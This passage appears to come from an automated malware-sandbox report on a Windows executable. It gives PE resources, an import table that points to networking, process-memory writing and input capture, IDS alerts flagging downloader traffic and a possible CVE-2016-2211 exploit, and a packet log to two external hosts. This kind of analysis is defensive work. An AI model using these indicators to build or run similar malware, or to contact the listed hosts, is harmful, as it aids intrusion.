RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0x4df88	data			1.000331905513389
RT_GROUP_ICON	0x12a740	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x12a7b8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x12a7cc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x12a7e0	0x14	data	English	Great Britain	1.25
RT_VERSION	0x12a7f4	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x12a8d0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T18:07:47.380656+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49709	443	192.168.2.10	188.114.96.3
2024-07-25T18:07:46.780990+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49707	80	192.168.2.10	193.122.130.0
2024-07-25T18:07:47.921622+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49710	80	192.168.2.10	193.122.130.0
2024-07-25T18:08:02.910607+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49725	20.12.23.50	192.168.2.10
2024-07-25T18:07:53.278689+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49717	443	192.168.2.10	188.114.96.3
2024-07-25T18:07:51.363340+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49715	443	192.168.2.10	188.114.96.3
2024-07-25T18:08:23.166150+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	55284	40.127.169.103	192.168.2.10
2024-07-25T18:07:45.906002+0200	TCP	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	49707	80	192.168.2.10	193.122.130.0
2024-07-25T18:07:48.538694+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49711	443	192.168.2.10	188.114.96.3
2024-07-25T18:07:54.397092+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49719	443	192.168.2.10	188.114.96.3
2024-07-25T18:08:21.566686+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	55283	40.127.169.103	192.168.2.10

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 18:07:45.186940908 CEST	49707	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:45.191965103 CEST	80	49707	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:45.192048073 CEST	49707	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:45.192295074 CEST	49707	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:45.197603941 CEST	80	49707	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:45.740808010 CEST	80	49707	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:45.745800972 CEST	49707	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:45.752789021 CEST	80	49707	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:45.851861954 CEST	80	49707	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:45.906002045 CEST	49707	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:45.928528070 CEST	49708	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:45.928563118 CEST	443	49708	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:45.928716898 CEST	49708	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:45.934786081 CEST	49708	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:45.934813023 CEST	443	49708	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:46.419466019 CEST	443	49708	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:46.419569016 CEST	49708	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:46.424921989 CEST	49708	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:46.424937963 CEST	443	49708	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:46.425247908 CEST	443	49708	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:46.468496084 CEST	49708	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:46.480145931 CEST	49708	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:46.520507097 CEST	443	49708	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:46.616225004 CEST	443	49708	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:46.616318941 CEST	443	49708	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:46.616389036 CEST	49708	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:46.622785091 CEST	49708	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:46.628179073 CEST	49707	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:46.634407997 CEST	80	49707	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:46.738796949 CEST	80	49707	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:46.741643906 CEST	49709	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:46.741678953 CEST	443	49709	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:46.741758108 CEST	49709	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:46.742094994 CEST	49709	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:46.742109060 CEST	443	49709	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:46.780989885 CEST	49707	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:47.230828047 CEST	443	49709	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:47.233200073 CEST	49709	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:47.233217001 CEST	443	49709	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:47.380660057 CEST	443	49709	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:47.380755901 CEST	443	49709	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:47.380873919 CEST	49709	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:47.381712914 CEST	49709	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:47.385181904 CEST	49707	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:47.386491060 CEST	49710	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:47.391597033 CEST	80	49707	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:47.391613960 CEST	80	49710	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:47.391648054 CEST	49707	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:47.391695976 CEST	49710	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:47.391824007 CEST	49710	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:47.396655083 CEST	80	49710	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:47.880923986 CEST	80	49710	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:47.882260084 CEST	49711	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:47.882296085 CEST	443	49711	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:47.882364035 CEST	49711	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:47.882613897 CEST	49711	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:47.882622957 CEST	443	49711	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:47.921622038 CEST	49710	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:48.384401083 CEST	443	49711	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:48.387132883 CEST	49711	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:48.387155056 CEST	443	49711	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:48.538701057 CEST	443	49711	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:48.538796902 CEST	443	49711	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:48.538851023 CEST	49711	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:48.539330959 CEST	49711	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:48.543787003 CEST	49712	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:48.548707008 CEST	80	49712	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:48.548845053 CEST	49712	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:48.548875093 CEST	49712	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:48.554717064 CEST	80	49712	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:49.196365118 CEST	80	49712	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:49.199696064 CEST	49713	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:49.199744940 CEST	443	49713	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:49.200016022 CEST	49713	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:49.200505972 CEST	49713	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:49.200517893 CEST	443	49713	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:49.249947071 CEST	49712	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:49.894942045 CEST	443	49713	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:49.896848917 CEST	49713	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:49.896864891 CEST	443	49713	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:50.032871962 CEST	443	49713	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:50.032959938 CEST	443	49713	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:50.033015013 CEST	49713	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:50.033456087 CEST	49713	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:50.036906004 CEST	49712	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:50.037631035 CEST	49714	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:50.042706966 CEST	80	49712	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:50.042721987 CEST	80	49714	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:50.042768002 CEST	49712	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:50.042819023 CEST	49714	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:50.042910099 CEST	49714	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:50.049935102 CEST	80	49714	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:50.586170912 CEST	80	49714	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:50.587424994 CEST	49715	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:50.587475061 CEST	443	49715	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:50.587551117 CEST	49715	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:50.587774038 CEST	49715	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:50.587789059 CEST	443	49715	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:50.640381098 CEST	49714	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:51.090229034 CEST	443	49715	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:51.092133045 CEST	49715	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:51.092164993 CEST	443	49715	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:51.363050938 CEST	443	49715	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:51.363136053 CEST	443	49715	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:51.363210917 CEST	49715	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:51.363801003 CEST	49715	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:51.367108107 CEST	49714	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:51.368359089 CEST	49716	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:51.437786102 CEST	80	49716	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:51.437803984 CEST	80	49714	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:51.437882900 CEST	49714	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:51.437905073 CEST	49716	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:51.438067913 CEST	49716	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:51.456206083 CEST	80	49716	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:52.103502989 CEST	80	49716	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:52.104796886 CEST	49717	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:52.104850054 CEST	443	49717	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:52.104902983 CEST	49717	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:52.105189085 CEST	49717	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:52.105205059 CEST	443	49717	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:52.156033039 CEST	49716	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:53.075546980 CEST	443	49717	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:53.077400923 CEST	49717	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:53.077434063 CEST	443	49717	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:53.278702974 CEST	443	49717	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:53.278791904 CEST	443	49717	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:53.278887987 CEST	49717	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:53.279499054 CEST	49717	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:53.283165932 CEST	49716	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:53.284559965 CEST	49718	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:53.292534113 CEST	80	49718	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:53.292649031 CEST	49718	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:53.292788982 CEST	49718	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:53.294300079 CEST	80	49716	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:53.294364929 CEST	49716	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:53.298043013 CEST	80	49718	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:53.780328035 CEST	80	49718	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:53.782166958 CEST	49719	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:53.782224894 CEST	443	49719	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:53.782314062 CEST	49719	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:53.782607079 CEST	49719	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:53.782622099 CEST	443	49719	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:53.828222990 CEST	49718	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:54.259052038 CEST	443	49719	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:54.262382030 CEST	49719	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:54.262394905 CEST	443	49719	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:54.397100925 CEST	443	49719	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:54.397197008 CEST	443	49719	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:54.397286892 CEST	49719	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:54.397783995 CEST	49719	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:54.400930882 CEST	49718	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:54.402045965 CEST	49720	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:54.406944036 CEST	80	49718	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:54.407151937 CEST	80	49720	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:54.407202959 CEST	49718	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:54.407216072 CEST	49720	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:54.407397985 CEST	49720	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:54.414196014 CEST	80	49720	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:55.060585022 CEST	80	49720	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:55.061817884 CEST	49721	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:55.061861038 CEST	443	49721	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:55.061959982 CEST	49721	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:55.062187910 CEST	49721	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:55.062201977 CEST	443	49721	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:55.109154940 CEST	49720	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:55.562243938 CEST	443	49721	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:55.564290047 CEST	49721	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:55.564337015 CEST	443	49721	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:55.805166006 CEST	443	49721	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:55.805285931 CEST	443	49721	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:55.805361986 CEST	49721	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:55.805828094 CEST	49721	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:55.808547974 CEST	49720	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:55.809623957 CEST	49722	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:55.815535069 CEST	80	49720	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:55.815625906 CEST	49720	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:55.816113949 CEST	80	49722	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:55.816179991 CEST	49722	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:55.816284895 CEST	49722	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:55.823518038 CEST	80	49722	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:56.962066889 CEST	80	49722	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:56.964356899 CEST	49723	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:56.964396000 CEST	443	49723	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:56.964500904 CEST	49723	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:56.964751959 CEST	49723	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:56.964768887 CEST	443	49723	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:57.015431881 CEST	49722	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:57.644475937 CEST	443	49723	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:57.646199942 CEST	49723	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:57.646218061 CEST	443	49723	188.114.96.3	192.168.2.10
